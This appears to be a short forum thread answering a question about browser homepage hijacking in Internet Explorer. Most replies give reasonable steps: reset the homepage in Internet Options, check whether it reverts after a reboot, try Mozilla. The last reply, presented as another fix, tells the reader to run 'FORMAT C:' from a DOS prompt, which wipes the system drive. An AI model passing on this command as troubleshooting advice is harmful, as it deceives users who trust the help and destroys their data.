(I bought this Tag Line from this guy. He seemed nice, but the Tag Line simply does not work.)

There's a lot of that homepage hijacking going on. Just click tool, internet options and then type in the homepage you want or click default.

I presume you're using IE.
Up top click tools & then internet options...

You may have a browser hijacker at work. If you reboot your system after setting your browser back to you favorite page then it goes back to the unwanted page then you have a hijacker. Best solution is to download the Mozilla browser which is more secure than IE.

Click "Start-Run" and enter "Command," then click "OK" to bring up a DOS prompt window, then enter "FORMAT C:" at the command line.
